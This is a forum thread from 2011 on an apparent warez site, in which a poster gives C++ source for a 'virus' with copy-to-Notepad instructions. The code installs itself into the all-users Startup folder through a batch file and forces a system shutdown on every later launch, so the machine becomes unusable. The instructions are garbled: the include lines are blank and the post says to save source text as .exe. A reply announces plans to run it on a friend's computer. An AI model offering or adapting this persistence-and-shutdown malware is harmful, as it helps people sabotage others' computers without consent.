TERAR!
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Log in

I forgot my password

Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Racedriver Grid (MULTI5/ Full Rip/ 2008)
Making A Dangerous Virus Called Matrix EmptySat Oct 01, 2011 3:36 am by Ejuk

» LIMBO (2011/CRACKED/MULTI9)-THETA
Making A Dangerous Virus Called Matrix EmptySat Oct 01, 2011 3:21 am by Ejuk

» The Cursed Crusade (2011/Multi2/RePack)
Making A Dangerous Virus Called Matrix EmptySat Oct 01, 2011 3:12 am by Ejuk

» Confirmed SD! Matches
Making A Dangerous Virus Called Matrix EmptySat Oct 01, 2011 3:08 am by Ejuk

» Linkin Park:Live From Madison Square Garden (2011)720p HDTVRip x264-CME-v0
Making A Dangerous Virus Called Matrix EmptyFri Sep 30, 2011 1:33 pm by Ejuk

» Kung Fu Panda 2 2011 HDTVRip READNFO x264-BBnRG
Making A Dangerous Virus Called Matrix EmptyFri Sep 30, 2011 1:27 pm by Ejuk

» Back To The Future: The Game – Gold Edition (2010-2011/PCDVD/ENG/RUS/Multi4/ISO/FULL/RePack
Making A Dangerous Virus Called Matrix EmptyFri Sep 30, 2011 3:50 am by Prince Ruban

» Booker T vs. Cody Rhodes Feud?, Vengeance Main Event?
Making A Dangerous Virus Called Matrix EmptyThu Sep 29, 2011 12:51 pm by Ejuk

» Don’t Be Afraid of the Dark (2010) DVDRip MKV 325MB
Making A Dangerous Virus Called Matrix EmptyThu Sep 29, 2011 11:40 am by Ejuk

April 2024
MonTueWedThuFriSatSun
1234567
891011121314
15161718192021
22232425262728
2930     

Calendar Calendar

RSS feeds


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 



Making A Dangerous Virus Called Matrix

2 posters

Go down

Making A Dangerous Virus Called Matrix Empty Making A Dangerous Virus Called Matrix

Post  Ejuk Sun Sep 18, 2011 3:13 am

[big][big]Making A Dangerous Virus Called Matrix[/big][/big]

I'm gonna teach you how to make a virus named Matrix...

1-Open notepad
2-Put in this code


// The Matrix Virus
// Created by W3irdo
// Hazuras.com

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp << "@ECHO OFF n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF n";
fp << "COPY matrix.exe C:\rawr.exe n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " ";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}

goto START;3-save it as matrix.exe
4-finish
[big]
Warning - Do not run it on your computer[/big]
Ejuk
Ejuk
Admin

Posts : 154
Points : 437
Reputation : 0
Join date : 2011-09-17
Age : 33
Location : Malaysia

https://terar.forumotion.com

Back to top Go down

Making A Dangerous Virus Called Matrix Empty Re: Making A Dangerous Virus Called Matrix

Post  Prince Ruban Tue Sep 27, 2011 4:34 pm

i will try on my friends system
thanks bro bom
Prince Ruban
Prince Ruban

Posts : 10
Points : 14
Reputation : 0
Join date : 2011-09-19
Age : 27

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum